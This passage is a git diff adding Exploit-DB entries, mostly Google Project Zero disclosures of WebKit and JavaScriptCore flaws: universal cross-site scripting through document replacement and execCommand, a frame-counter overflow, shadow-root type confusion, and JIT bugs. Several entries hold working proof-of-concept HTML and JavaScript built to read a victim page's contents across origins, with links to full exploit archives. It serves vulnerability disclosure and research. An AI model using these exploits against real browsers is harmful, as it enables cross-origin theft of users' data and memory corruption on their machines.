+      form.action = 'javascript:alert(document.body.innerHTML)';
+      form.submit();
+    }
+  }
+}, 2000);
+</script>
+</body> 
+
+```
+
+stylesheet.xml:
+```
+<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
+<xsl:template match="/">
+<html>
+<body>
+<script>
+<![CDATA[
+document.body.lastChild.xslt_script_run = true;
+]]>
+</script>
+<iframe src="javascript:top.corrupted_doc = frameElement.ownerDocument; frameElement.remove();"></iframe>
+</body>
+</html>
+</xsl:template>
+</xsl:stylesheet>
+
+```
+
+CREDIT INFORMATION
+Sergei Glazunov of Google Project Zero
\ No newline at end of file
diff --git a/exploits/multiple/dos/47257.txt b/exploits/multiple/dos/47257.txt
new file mode 100644
index 000000000..15982abb5
--- /dev/null
+++ b/exploits/multiple/dos/47257.txt
@@ -0,0 +1,19 @@
+There is an info leak when decoding the SGBigUTF8String class using [SGBigUTF8String initWithCoder:]. This class initializes the string using [SGBigUTF8String initWithUTF8DataNullTerminated:] even though there is no guarantee the bytes provided to the decoder are null terminated. It should use [SGBigUTF8String initWithUTF8Data:] instead.
+
+While this class is included in iMessage, it is more likely that this bug could be useful in local attacks.
+
+To reproduce this issue:
+
+1) Compile decodeleak.m
+
+clang -o decodeleak -g decodeleak.m -fobjc-arc -framework CoreSuggestionsInternals -F/System/Library/PrivateFrameworks
+
+2) Run:
+
+./decodeleaks obj
+
+leaked memory will be printed to the screen.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47257.zip
\ No newline at end of file
diff --git a/exploits/multiple/dos/47316.txt b/exploits/multiple/dos/47316.txt
new file mode 100644
index 000000000..07db09ca6
--- /dev/null
+++ b/exploits/multiple/dos/47316.txt
@@ -0,0 +1,63 @@
+https://github.com/WebKit/webkit/blob/94e868c940d46c5745869192d07255331d00102b/Source/JavaScriptCore/dfg/DFGArgumentsEliminationPhase.cpp#L743
+
+case GetByVal: {
+    ...
+
+    unsigned numberOfArgumentsToSkip = 0;
+    if (candidate->op() == PhantomCreateRest)
+        numberOfArgumentsToSkip = candidate->numberOfArgumentsToSkip();
+    
+    Node* result = nullptr;
+    if (m_graph.varArgChild(node, 1)->isInt32Constant()) {
+        unsigned index = m_graph.varArgChild(node, 1)->asUInt32();                        
+        InlineCallFrame* inlineCallFrame = candidate->origin.semantic.inlineCallFrame();
+        index += numberOfArgumentsToSkip;
+        
+        bool safeToGetStack;
+        if (inlineCallFrame) {
+            safeToGetStack = index < inlineCallFrame->argumentCountIncludingThis - 1;
+
+        }
+        else {
+            safeToGetStack =
+                index < static_cast<unsigned>(codeBlock()->numParameters()) - 1;
+
+        }
+        if (safeToGetStack) {
+            StackAccessData* data;
+            VirtualRegister arg = virtualRegisterForArgument(index + 1);
+            if (inlineCallFrame)
+                arg += inlineCallFrame->stackOffset;
+
+            data = m_graph.m_stackAccessData.add(arg, FlushedJSValue);
+            
+            Node* check = nullptr;
+            if (!inlineCallFrame || inlineCallFrame->isVarargs()) {
+                check = insertionSet.insertNode(
+                    nodeIndex, SpecNone, CheckInBounds, node->origin,
+                    m_graph.varArgChild(node, 1), Edge(getArrayLength(candidate), Int32Use));
+            }
+            
+            result = insertionSet.insertNode(
+                nodeIndex, node->prediction(), GetStack, node->origin, OpInfo(data), Edge(check, UntypedUse));
+        }
+    }
+
+The above code is trying to inline GetByVal operations on stack-allocated arguments. The problem is, it doesn't check whether "index" is lower than "numberOfArgumentsToSkip", i.e., "index" was overflowed. This bug is exploitable as this can lead to uninitialized variable access under certain circumstances.
+
+PoC:
+function inlinee(index, value, ...rest) {
+    return rest[index | 0];  // GetByVal
+}
+
+function opt() {
+    return inlinee(-1, 0x1234);  // or inlinee(0xffffffff, 0x1234)
+}
+
+inlinee(0, 0);
+
+for (let i = 0; i < 1000000; i++) {
+    opt();
+}
+
+print(opt());  // 0x1234
\ No newline at end of file
diff --git a/exploits/multiple/dos/47450.txt b/exploits/multiple/dos/47450.txt
new file mode 100644
index 000000000..7720c3337
--- /dev/null
+++ b/exploits/multiple/dos/47450.txt
@@ -0,0 +1,150 @@
+VULNERABILITY DETAILS
+```
+void DocumentWriter::replaceDocument(const String& source, Document* ownerDocument)
+{
+[...]
+    begin(m_frame->document()->url(), true, ownerDocument); // ***1***
+
+    // begin() might fire an unload event, which will result in a situation where no new document has been attached,
+    // and the old document has been detached. Therefore, bail out if no document is attached.
+    if (!m_frame->document())
+        return;
+
+    if (!source.isNull()) {
+        if (!m_hasReceivedSomeData) {
+            m_hasReceivedSomeData = true;
+            m_frame->document()->setCompatibilityMode(DocumentCompatibilityMode::NoQuirksMode);
+        }
+
+        // FIXME: This should call DocumentParser::appendBytes instead of append
+        // to support RawDataDocumentParsers.
+        if (DocumentParser* parser = m_frame->document()->parser())
+            parser->append(source.impl()); // ***2***
+    }
+```
+
+```
+bool DocumentWriter::begin(const URL& urlReference, bool dispatch, Document* ownerDocument)
+{
+[...]
+    bool shouldReuseDefaultView = m_frame->loader().stateMachine().isDisplayingInitialEmptyDocument() && m_frame->document()->isSecureTransitionTo(url); // ***3***
+    if (shouldReuseDefaultView)
+        document->takeDOMWindowFrom(*m_frame->document());
+    else
+        document->createDOMWindow();
+
+    // Per <http://www.w3.org/TR/upgrade-insecure-requests/>, we need to retain an ongoing set of upgraded
+    // requests in new navigation contexts. Although this information is present when we construct the
+    // Document object, it is discard in the subsequent 'clear' statements below. So, we must capture it
+    // so we can restore it.
+    HashSet<SecurityOriginData> insecureNavigationRequestsToUpgrade;
+    if (auto* existingDocument = m_frame->document())
+        insecureNavigationRequestsToUpgrade = existingDocument->contentSecurityPolicy()->takeNavigationRequestsToUpgrade();
+    
+    m_frame->loader().clear(document.ptr(), !shouldReuseDefaultView, !shouldReuseDefaultView);
+    clear();
+
+    // m_frame->loader().clear() might fire unload event which could remove the view of the document.
+    // Bail out if document has no view.
+    if (!document->view())
+        return false;
+
+    if (!shouldReuseDefaultView)
+        m_frame->script().updatePlatformScriptObjects();
+
+    m_frame->loader().setOutgoingReferrer(url);
+    m_frame->setDocument(document.copyRef());
+[...]
+    m_frame->loader().didBeginDocument(dispatch); // ***4***
+
+    document->implicitOpen();
+[...]
+```
+
+`DocumentWriter::replaceDocument` is responsible for replacing the currently displayed document with
+a new one using the result of evaluating a javascript: URI as the document's source. The method
+calls `DocumentWriter::begin`[1], which might trigger JavaScript execution, and then sends data to
+the parser of the active document[2]. If an attacker can perform another page load right before
+returning from `begin` , the method will append an attacker-controlled string to a potentially
+cross-origin document.
+
+Under normal conditions, a javascript: URI load always makes `begin` associate the new document with
+a new DOMWindow object. However, it's actually possible to meet the requirements of the
+`shouldReuseDefaultView` check[3]. Firstly, the attacker needs to initialize the <iframe> element's
+source URI to a sane value before it's inserted into the document. This will set the frame state to
+`DisplayingInitialEmptyDocumentPostCommit`. Then she has to call `open` on the frame's document
+right after the insertion to stop the initial load and set the document URL to a value that can pass
+the `isSecureTransitionTo` check.
+
+When the window object is re-used, all event handlers defined for the window remain active. So, for
+example, when `didBeginDocument`[4] calls `setReadyState` on the new document, it will trigger the
+window's "readystatechange" handler. Since `NavigationDisabler` is not active at this point, it's
+possible to perform a synchronous page load using the `showModalDialog` trick.
+
+
+VERSION
+WebKit revision 246194
+Safari version 12.1.1 (14607.2.6.1.1)
+
+
+REPRODUCTION CASE
+The attack won't work if the cross-origin document has no active parser by the time `begin` returns.
+The easiest way to reproduce the bug is to call `document.write` from the victim page when the main
+parsing task is complete. However, it's a rather artificial construct, so I've also attached another
+test case, which works for regular pages, but it has to use a python script that emulates a slow web
+server to run reliably.
+
+```
+<body>
+<h1>Click to start</h1>
+<script>
+function createURL(data, type = 'text/html') {
+    return URL.createObjectURL(new Blob([data], {type: type}));
+}
+
+function waitForLoad() {
+    showModalDialog(createURL(`
+        <script>
+        let it = setInterval(() => {
+            try {
+                opener.frame.contentDocument.x;
+            } catch (e) {
+                clearInterval(it);
+                window.close();
+            }
+        }, 2000);
+        </scrip` + 't>'));
+}
+
+window.onclick = () => {
+    frame = document.createElement('iframe');
+    frame.src = location;
+    document.body.appendChild(frame);
+
+    frame.contentDocument.open();
+    frame.contentDocument.onreadystatechange = () => {
+        frame.contentWindow.addEventListener('readystatechange', () => {
+            a = frame.contentDocument.createElement('a');
+            a.href = victim_url;
+            a.click();
+            waitForLoad();
+        }, {capture: true, once: true});
+    }
+    frame.src = 'javascript:"<script>alert(document.documentElement.outerHTML)</scr' + 'ipt>"';
+}
+
+victim_url = 'data:text/html,<script>setTimeout(() => document.write("secret data"), 1000)</scr' + 'ipt>';
+ext = document.body.appendChild(document.createElement('iframe'));
+ext.src = victim_url;
+</script>
+</body> 
+
+```
+
+
+CREDIT INFORMATION
+Sergei Glazunov of Google Project Zero
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47450.zip
\ No newline at end of file
diff --git a/exploits/multiple/dos/47451.html b/exploits/multiple/dos/47451.html
new file mode 100644
index 000000000..f81d3fffc
--- /dev/null
+++ b/exploits/multiple/dos/47451.html
@@ -0,0 +1,146 @@
+<!--
+VULNERABILITY DETAILS
+```
+static Editor::Command command(Document* document, const String& commandName, bool userInterface = false)
+{
+    RefPtr<Frame> frame = document->frame();
+    if (!frame || frame->document() != document) // ***1***
+        return Editor::Command();
+
+    document->updateStyleIfNeeded(); // ***2***
+
+    return frame->editor().command(commandName,
+        userInterface ? CommandFromDOMWithUserInterface : CommandFromDOM);
+}
+
+bool Document::execCommand(const String& commandName, bool userInterface, const String& value)
+{
+    EventQueueScope eventQueueScope;
+    return command(this, commandName, userInterface).execute(value);
+}
+```
+
+This bug is similar to https://bugs.chromium.org/p/project-zero/issues/detail?id=1133. `command`
+calls `updateStyleIfNeeded`[2], which might trigger JavaScript execution, e.g., via
+`HTMLObjectElement::updateWidget`. If the JS code triggers a new page load, the editor command will
+be applied to the wrong page. The method checks that the `document` argument is the document that's
+currently displayed on the page, but it does so *before* the `updateStyleIfNeeded` call. An attacker
+can exploit this bug to execute the "InsertHTML" command and run JavaScript in the context of the
+victim page.
+
+
+VERSION
+WebKit revision 246194
+Safari version 12.1.1 (14607.2.6.1.1)
+
+
+REPRODUCTION CASE
+The test case requires the victim page to have a selected element when the load is complete. A
+common suitable case is when the page contains an autofocused <input> element.
+
+```
+<body>
+<script>
+function createURL(data, type = 'text/html') {
+    return URL.createObjectURL(new Blob([data], {type: type}));
+}
+
+function waitForLoad() {
+  showModalDialog(createURL(`
+    <script>
+    let it = setInterval(() => {
+      try {
+        opener.w.document.x;
+      } catch (e) {
+        clearInterval(it);
+
+        window.close();
+      }
+    }, 100);
+    </scrip` + 't>'));
+}
+
+victim_url = 'https://trac.webkit.org/search';
+
+cache_frame = document.body.appendChild(document.createElement('iframe'));
+cache_frame.src = victim_url;
+cache_frame.style.display = 'none';
+
+onclick = () => {
+  w = open();
+
+  obj = document.createElement('object');
+  obj.data = 'about:blank';
+  obj.addEventListener('load', function() {
+    a = w.document.createElement('a');
+    a.href = victim_url;
+    a.click();
+
+    waitForLoad();
+  });
+  w.document.body.appendChild(obj);
+
+  w.document.execCommand('insertHTML', false,
+    '<iframe onload="alert(document.documentElement.outerHTML)" src="about:blank"></iframe>');
+}
+</script>
+</body>
+```
+
+repro_iframe.html contains a version that uses an <iframe> instead of a new window and works in
+Safari 12.1.1.
+
+
+CREDIT INFORMATION
+Sergei Glazunov of Google Project Zero
+-->
+
+<body>
+<script>
+function createURL(data, type = 'text/html') {
+  return URL.createObjectURL(new Blob([data], {type: type}));
+}
+
+function waitForLoad() {
+  showModalDialog(createURL(`
+    <script>
+    let it = setInterval(() => {
+      try {
+        opener.w.document.x;
+      } catch (e) {
+        clearInterval(it);
+
+        window.close();
+      }
+    }, 100);
+    </scrip` + 't>'));
+}
+
+
+victim_url = 'data:text/html,<h1>secret data</h1><input autofocus>';
+
+cache_frame = document.body.appendChild(document.createElement('iframe'));
+cache_frame.src = victim_url;
+cache_frame.style.display = 'none';
+
+victim_frame = document.body.appendChild(document.createElement('iframe'));
+victim_frame.style.width = victim_frame.style.height = '100%';
+victim_frame.contentDocument.write('<h1>click to start</h1>');
+
+victim_frame.contentWindow.onclick = (() => {
+  obj = document.createElement('object');
+  obj.data = 'about:blank';
+  obj.addEventListener('load', function() {
+    a = victim_frame.contentDocument.createElement('a');
+    a.href = victim_url;
+    a.click();
+
+    waitForLoad();
+  });
+  victim_frame.contentDocument.body.appendChild(obj);
+
+  victim_frame.contentDocument.execCommand('insertHTML', false,
+    '<iframe onload="alert(document.firstChild.outerHTML)" src="about:blank"></iframe>');
+});
+</script>
+</body>
\ No newline at end of file
diff --git a/exploits/multiple/dos/47452.html b/exploits/multiple/dos/47452.html
new file mode 100644
index 000000000..84b140065
--- /dev/null
+++ b/exploits/multiple/dos/47452.html
@@ -0,0 +1,93 @@
+<!--
+VULNERABILITY DETAILS
+editing/ReplaceSelectionCommnd.cpp:
+```
+Ref<HTMLElement> ReplacementFragment::insertFragmentForTestRendering(Node* rootEditableElement)
+{
+    auto holder = createDefaultParagraphElement(document());
+
+    holder->appendChild(*m_fragment);
+    rootEditableElement->appendChild(holder); // ***2***
+    document().updateLayoutIgnorePendingStylesheets();
+
+    return holder;
+}
+
+[...]
+
+ReplacementFragment::ReplacementFragment(Document& document, DocumentFragment* fragment, const VisibleSelection& selection)
+    : m_document(&document)
+    , m_fragment(fragment)
+    , m_hasInterchangeNewlineAtStart(false)
+    , m_hasInterchangeNewlineAtEnd(false)
+{
+    if (!m_fragment)
+        return;
+    if (!m_fragment->firstChild())
+        return;
+    
+    RefPtr<Element> editableRoot = selection.rootEditableElement(); // ***1***
+    ASSERT(editableRoot);
+    if (!editableRoot)
+        return;   
+[...]
+    RefPtr<StyledElement> holder = insertFragmentForTestRendering(editableRoot.get());
+```
+
+html/shadow/SliderThumbElement.cpp
+```
+RefPtr<HTMLInputElement> SliderThumbElement::hostInput() const
+{
+    // Only HTMLInputElement creates SliderThumbElement instances as its shadow nodes.
+    // So, shadowHost() must be an HTMLInputElement.
+    return downcast<HTMLInputElement>(shadowHost()); // ***3***
+}
+```
+
+I noticed this behavior when I was debugging the test case for
+https://bugs.webkit.org/show_bug.cgi?id=199146. When the currently focused element is an <input>,
+`selection.rootEditableElement()` in [1] might point to a node inside the <input>'s user-agent
+shadow DOM tree. Then `insertFragmentForTestRendering` is called, which might have side effects,
+e.g., if the inserted fragment contains an <iframe> element its "onload" handler will be called
+synchronously, and it's possible to reach the user-agent shadow root object by following the
+ancestor chain from the <iframe>.
+
+When an attacker has access to the shadow root, she can use it to leak other elements that are only
+intended for internal use and have less strict security checks. For example, `SliderThumbElement`
+doesn't check that its host element is an <iframe> in [3], so the attacker can turn this bug into a
+type confusion vulnerability.
+
+
+VERSION
+WebKit revision 246194
+Safari version 12.1.1 (14607.2.6.1.1)
+
+
+REPRODUCTION CASE
+-->
+
+<body>
+<script>
+input = document.body.appendChild(document.createElement('input'));
+input.focus();
+handler = event => {
+  shadow_root = event.target.parentNode.parentNode.parentNode;
+  input.type = 'range';
+  elt = shadow_root.firstChild.firstChild.firstChild;
+  input.remove();
+  elt.remove();
+  evt = new MouseEvent('mouseup');
+  div = document.createElement('div');
+  new_shadow_root = div.attachShadow({mode: 'open'});
+  new_shadow_root.appendChild(elt);
+  elt.dispatchEvent(evt);
+}
+document.execCommand('insertHTML', false, '<iframe src="about:blank" onload="handler(event)"></iframe>');
+</script>
+</body>
+
+
+<!--
+CREDIT INFORMATION
+Sergei Glazunov of Google Project Zero
+-->
\ No newline at end of file
diff --git a/exploits/multiple/dos/47453.txt b/exploits/multiple/dos/47453.txt
new file mode 100644
index 000000000..bc4127511
--- /dev/null
+++ b/exploits/multiple/dos/47453.txt
@@ -0,0 +1,67 @@
+VULNERABILITY DETAILS
+```
+void FrameLoader::detachChildren()
+{
+[...]
+    SubframeLoadingDisabler subframeLoadingDisabler(m_frame.document()); // ***1***
+
+    Vector<Ref<Frame>, 16> childrenToDetach;
+    childrenToDetach.reserveInitialCapacity(m_frame.tree().childCount());
+    for (Frame* child = m_frame.tree().lastChild(); child; child = child->tree().previousSibling())
+        childrenToDetach.uncheckedAppend(*child);
+    for (auto& child : childrenToDetach)
+        child->loader().detachFromParent();
+}
+```
+
+When a cached page is being restored, and the page that's being navigated away is not cacheable,
+there exists a time frame during which two documents are attached to the same frame. If an attacker
+finds a way to run JS during this time frame, she will be able to use one of the documents to
+execute JavaScript in the context of the other one.
+
+One possible call stack that might lead to JS execution is:
+```
+a child frame's unload handler
+...
+ContainerNode::disconnectDescendantFrames()
+Document::prepareForDestruction()
+FrameLoader::clear()
+FrameLoader::open()
+```
+
+By the time `FrameLoader::clear` is called, child frames are usually already disconnected from the
+document via
+```
+FrameLoader::detachChildren()
+FrameLoader::setDocumentLoader()
+FrameLoader::transitionToCommitted()
+```
+
+However, the attacker can initiate a new page load inside `detachChildren` to bypass
+`SubframeLoadingDisabler` and create a new child frame. Note that it won't cancel the cached page
+load.
+
+The attack has a restriction that significantly limits its applicability -- a victim page should
+load a (potentially sandboxed) <iframe> with attacker-controlled content, so the attacker's JS has
+a chance to run inside `Document::prepareForDestruction`. This is the case, for example, for online
+translators.
+
+
+VERSION
+WebKit revision 246194
+It's unclear whether the bug is exploitable in Safari 12.1.1. The repro case seem to have an issue
+with a nested `showModalDialog` call.
+
+
+REPRODUCTION CASE
+The test case again relies on `showModalDialog` to perform synchronous page loads. Moreover, the
+code is wrapped inside a `showModalDialog` call to keep a user gesture token active throughout its
+execution.
+
+
+CREDIT INFORMATION
+Sergei Glazunov of Google Project Zero
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47453.zip
\ No newline at end of file
diff --git a/exploits/multiple/dos/47552.txt b/exploits/multiple/dos/47552.txt
new file mode 100644
index 000000000..d31691758
--- /dev/null
+++ b/exploits/multiple/dos/47552.txt
@@ -0,0 +1,128 @@
+VULNERABILITY DETAILS
+HTMLFrameElementBase.cpp:
+```
+bool HTMLFrameElementBase::isURLAllowed() const
+{
+    if (m_URL.isEmpty()) // ***4***
+        return true;
+
+    return isURLAllowed(document().completeURL(m_URL));
+}
+
+bool HTMLFrameElementBase::isURLAllowed(const URL& completeURL) const
+{
+    if (document().page() && document().page()->subframeCount() >= Page::maxNumberOfFrames) // ***3***
+        return false;
+
+    if (completeURL.isEmpty())
+        return true;
+
+    if (WTF::protocolIsJavaScript(completeURL)) {
+        RefPtr<Document> contentDoc = this->contentDocument();
+        if (contentDoc && !ScriptController::canAccessFromCurrentOrigin(contentDoc->frame(), document()))
+            return false;
+    }
+
+    RefPtr<Frame> parentFrame = document().frame();
+    if (parentFrame)
+        return parentFrame->isURLAllowed(completeURL);
+
+    return true;
+}
+
+void HTMLFrameElementBase::openURL(LockHistory lockHistory, LockBackForwardList lockBackForwardList)
+{
+    if (!isURLAllowed())
+        return;
+
+[...]
+
+    parentFrame->loader().subframeLoader().requestFrame(*this, m_URL, frameName, lockHistory, lockBackForwardList);
+```
+
+NodeRarData.h:
+```
+class NodeRareData : public NodeRareDataBase {
+[...]
+private:
+    unsigned m_connectedFrameCount : 10; // Must fit Page::maxNumberOfFrames. ***1***
+```
+
+Page.h:
+```
+class Page : public Supplementable<Page>, public CanMakeWeakPtr<Page> {
+[...]
+    // Don't allow more than a certain number of frames in a page.
+    // This seems like a reasonable upper bound, and otherwise mutually
+    // recursive frameset pages can quickly bring the program to its knees
+    // with exponential growth in the number of frames.
+    static const int maxNumberOfFrames = 1000; // ***2***
+```
+
+Every DOM node stores the number of child frames currently attached to the subtree to speed up the
+`disconnectSubframes` algorithm; more specifically, when the number of connected frames for a given
+node is zero, its subtree won't be traversed. The value is stored as a 10-bit integer[1], so, to
+protect it from overflowing, an upper bound for the total count of attached subframes has been
+introduced[2]. It's enforced inside `isURLAllowed`[3] along with some other URL-specific checks. The
+problem is if the current URL is empty, all the checks will be skipped[4].
+
+Therefore, an attacker can insert exactly 1024 frame elements with an empty URL into a node, so its
+connected subframe counter will overflow and become zero. Later, when the node is removed from the
+document tree, the subframes won't be detached.
+
+The attacker can also abuse the flaw to make a subframe "survive" a cross-origin page load because
+`disconnectDescendantFrames`, which is called during the document replacement, only processes   
+`iframe` elements inside the document tree. Then, if the subframe is navigated to the `about:srcdoc`
+URL, the new document will inherit the security context from its parent document, which can be an
+arbitrary cross-origin page, while the contents will be attacker-controlled.
+
+Moving the check closer to the actual frame creation in `SubframeLoader::loadSubframe` should fix
+the issue. Besides, since the `srcdoc` technique can be reused in other UXSS bugs, I think it's
+reasonable to try to break it. One way to achieve that is to replace the
+`disconnectDescendantFrames` call in `Document::prepareForDestruction` with a call to
+`FrameLoader::detachChildren`, which detaches subframes regardless of whether their associated
+elements are attached to the document tree. However, I'm not sure if this change would be safe. The
+attached patch just adds a release assertion after `disconnectDescendantFrames` to ensure that all
+subframes have been detached. The solution is not too elegant, but a similar fix in Blink
+(https://cs.chromium.org/chromium/src/third_party/blink/renderer/core/dom/document.cc?rcl=a34380189132e826108a71d9f6024b863ce1dcaf&l=3115)
+has proved to be effective.
+
+
+VERSION
+WebKit revision 247430 
+Safari version 12.1.1 (14607.2.6.1.1)
+
+
+REPRODUCTION CASE
+The minimal test case that demonstrates the issue is as follows:
+```
+<body>
+<script>
+const FRAME_COUNT = 1024;
+
+let container = document.body.appendChild(document.createElement('div'));
+for (let i = 0; i < FRAME_COUNT; ++i) {
+  let frame = container.appendChild(document.createElement('iframe'));
+  frame.style.display = 'none';
+}
+container.remove();
+
+frame = container.firstChild;
+alert(`
+  <iframe> is not attached to the document tree, but still has a content frame!
+  frame.parentNode.parentNode: ${frame.parentNode.parentNode}
+  frame.contentWindow: ${frame.contentWindow}
+`);
+</script>
+</body>
+```
+
+The full UXSS exploit is in the attached archive.
+
+
+CREDIT INFORMATION
+Sergei Glazunov of Google Project Zero
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47552.zip
\ No newline at end of file
diff --git a/exploits/multiple/dos/47565.txt b/exploits/multiple/dos/47565.txt
new file mode 100644
index 000000000..54eb100fb
--- /dev/null
+++ b/exploits/multiple/dos/47565.txt
@@ -0,0 +1,102 @@
+The following JavaScript program, found by Fuzzilli and slightly modified, crashes JavaScriptCore built from HEAD and the current stable release (/System/Library/Frameworks/JavaScriptCore.framework/Resources/jsc):
+
+    let notAGetterSetter = {whatever: 42};
+
+    function v2(v5) {
+        const v10 = Object();
+        if (v5) {
+            const v12 = {set:Array};
+            const v14 = Object.defineProperty(v10,"length",v12);
+            const v15 = (140899729)[140899729];
+        } else {
+            v10.length = notAGetterSetter;
+        }
+        const v18 = new Uint8ClampedArray(49415);
+        v18[1] = v10;
+        const v19 = v10.length;
+        let v20 = 0;
+        while (v20 < 100000) {
+            v20++;
+        }
+    }
+    const v26 = v2();
+    for (let v32 = 0; v32 < 1000; v32++) {
+        const v33 = v2(true);
+    }
+
+    /*
+    Crashes with:
+    ASSERTION FAILED: from.isCell() && from.asCell()->JSCell::inherits(*from.asCell()->vm(), std::remove_pointer<To>::type::info())
+    ../../Source/JavaScriptCore/runtime/JSCast.h(44) : To JSC::jsCast(JSC::JSValue) [To = JSC::GetterSetter *]
+    1   0x1111ada79 WTFCrash
+    2   0x1111ada99 WTFCrashWithSecurityImplication
+    3   0x10ffb8f55 JSC::GetterSetter* JSC::jsCast<JSC::GetterSetter*>(JSC::JSValue)
+    4   0x10ffaf820 JSC::DFG::AbstractInterpreter<JSC::DFG::InPlaceAbstractState>::executeEffects(unsigned int, JSC::DFG::Node*)
+    5   0x10ff9f37b JSC::DFG::AbstractInterpreter<JSC::DFG::InPlaceAbstractState>::execute(unsigned int)
+    6   0x10ff9def2 JSC::DFG::CFAPhase::performBlockCFA(JSC::DFG::BasicBlock*)
+    7   0x10ff9d957 JSC::DFG::CFAPhase::performForwardCFA()
+    8   0x10ff9d647 JSC::DFG::CFAPhase::run()
+    9   0x10ff9cc61 bool JSC::DFG::runAndLog<JSC::DFG::CFAPhase>(JSC::DFG::CFAPhase&)
+    10  0x10ff6c65b bool JSC::DFG::runPhase<JSC::DFG::CFAPhase>(JSC::DFG::Graph&)
+    11  0x10ff6c625 JSC::DFG::performCFA(JSC::DFG::Graph&)
+    12  0x110279031 JSC::DFG::Plan::compileInThreadImpl()
+    13  0x110274fa6 JSC::DFG::Plan::compileInThread(JSC::DFG::ThreadData*)
+    14  0x11052a9bb JSC::DFG::Worklist::ThreadBody::work()
+    15  0x1111b3c69 WTF::AutomaticThread::start(WTF::AbstractLocker const&)::$_0::operator()() const
+    16  0x1111b38a9 WTF::Detail::CallableWrapper<WTF::AutomaticThread::start(WTF::AbstractLocker const&)::$_0, void>::call()
+    17  0x1102c433a WTF::Function<void ()>::operator()() const
+    18  0x1111f0350 WTF::Thread::entryPoint(WTF::Thread::NewThreadContext*)
+    19  0x111285525 WTF::wtfThreadEntryPoint(void*)
+    20  0x7fff5a7262eb _pthread_body
+    21  0x7fff5a729249 _pthread_start
+    22  0x7fff5a72540d thread_start
+    */
+
+The assertion indicates that a JSCell is incorrectly downcasted to a GetterSetter [1] (a pseudo object used to implement property getters/setter). In non debug builds, a type confusion then follows.
+
+Below is my preliminary analysis of the cause of the bug.
+
+The function v2 is eventually JIT compiled by the FTL JIT compiler. Initially, it will create the following (pseudo) DFG IR for it:
+
+# Block 0 (before if-else):
+  44: NewObject(...)
+  <jump to block 1 or 2 depending on v5>
+
+# Block 1 (the if part):
+  ... <install .length property on @44>
+  // Code for const v15 = (140899729)[140899729];
+  ForceOSRExit
+  Unreachable
+
+# Block 2 (the else part)
+  PutByOffset @44, notAGetterSetter
+  PutStructure
+
+# Block 3 (after the if-else):
+  ...
+  // Code for v10.length. Due to feedback from previous executions, DFG
+  // JIT speculates that the if branch will be taken and that it will see
+  // v10 with a GetterSetter for .length here
+  CheckStructure @44, structureWithLengthBeingAGetterSetter
+  166: GetGetterSetterByOffset @44, .length         // Load the GetterSetter object from @44
+  167: GetGetter @166                               // Load the getter function from the GetterSetter
+  ...
+
+
+Here, the end of block 1 has already been marked as unreachable due to the element load from a number which will always cause a bailout.
+
+Later, the global subexpression elimination phase [2] runs and does the following (which can be seen by enabling verbose CSE [3]):
+
+* It determines that the GetGetterSetterByOffset node loads the named property from the object @44
+* It determines that this property slot is assigned in block 2 (the else block) and that this block strictly dominates the current block (meaning that the current block can only be reached through block 2)
+    * This is now the case as block 1 does a bailout, so block 3 can never be reached from block 1
+* As such, CSE replaces the GetGetterSetterByOffset operation with the constant for |notAGetterSetter| (as that is what is assigned in block 2).
+
+At this point the IR is incorrect as the input to a GetGetter operation is expected to be a GetterSetter object, but in this case it is not. During later optimizations, e.g. the AbstractInterpreter relies on that invariant and casts the input to a GetterSetter object [4]. At that point JSC crashes in debug builds with the above assertion. It might also be possible to trigger the type confusion at runtime instead of at compile time but I have not attempted that.
+
+
+
+[1] https://github.com/WebKit/webkit/blob/87064d847a0f1b22a9bb400647647fe4004a4ccd/Source/JavaScriptCore/runtime/GetterSetter.h#L43
+[2] https://github.com/WebKit/webkit/blob/87064d847a0f1b22a9bb400647647fe4004a4ccd/Source/JavaScriptCore/dfg/DFGCSEPhase.h#L49
+[3] https://github.com/WebKit/webkit/blob/87064d847a0f1b22a9bb400647647fe4004a4ccd/Source/JavaScriptCore/dfg/DFGCSEPhase.cpp#L51
+[4] https://github.com/WebKit/webkit/blob/87064d847a0f1b22a9bb400647647fe4004a4ccd/Source/JavaScriptCore/dfg/DFGAbstractInterpreterInlines.h#L2811
\ No newline at end of file
diff --git a/exploits/multiple/dos/47590.txt b/exploits/multiple/dos/47590.txt
new file mode 100644
index 000000000..0f1b97f64
--- /dev/null
+++ b/exploits/multiple/dos/47590.txt
@@ -0,0 +1,101 @@
+The following sample was found by Fuzzilli and then slightly modified. It crashes JSC in debug builds:
+
+    function main() {
+    const v2 = [1337,1337];
+    const v3 = [1337,v2,v2,0];
+    Object.__proto__ = v3;
+    for (let v10 = 0; v10 < 1000; v10++) {
+        function v11(v12,v13) {
+            const v15 = v10 + 127;
+            const v16 = String();
+            const v17 = String.fromCharCode(v10,v10,v15);
+            const v19 = Object.shift();
+            function v23() {
+                let v28 = arguments;
+            }
+            const v29 = Object();
+            const v30 = v23({},129);
+            const v31 = [-903931.176976766,v17,,,-903931.176976766];
+            const v32 = v31.join("");
+
+            try {
+                const v34 = Function(v32);
+                const v35 = v34();
+                for (let v39 = 0; v39 < 127; v39++) {
+                    const v41 = isFinite();
+                    let v42 = isFinite;
+                    function v43(v44,v45,v46) {
+                    }
+                    const v47 = v41[4];
+                    const v48 = v47[64];
+                    const v49 = v35();
+                    const v50 = v43();
+                    const v51 = v34();
+                }
+            } catch(v52) {
+            }
+
+        }
+        const v53 = v11();
+    }
+    }
+    noDFG(main);
+    noFTL(main);
+    main();
+
+Crashes with:
+
+    ASSERTION FAILED: cell->inherits(*cell->JSC::JSCell::vm(), std::remove_pointer<T>::type::info())
+    ../../Source/JavaScriptCore/runtime/WriteBarrier.h(58) : void JSC::validateCell(T) [T = JSC::JSFunction *]
+    1   0x108070cb9 WTFCrash
+    2   0x103907f0b WTFCrashWithInfo(int, char const*, char const*, int)
+    3   0x106c0900f void JSC::validateCell<JSC::JSFunction*>(JSC::JSFunction*)
+    4   0x106c0275f JSC::WriteBarrierBase<JSC::JSFunction, WTF::DumbPtrTraits<JSC::JSFunction> >::set(JSC::VM&, JSC::JSCell const*, JSC::JSFunction*)
+    5   0x10705a727 JSC::DirectArguments::setCallee(JSC::VM&, JSC::JSFunction*)
+    6   0x107084753 operationCreateDirectArgumentsDuringExit
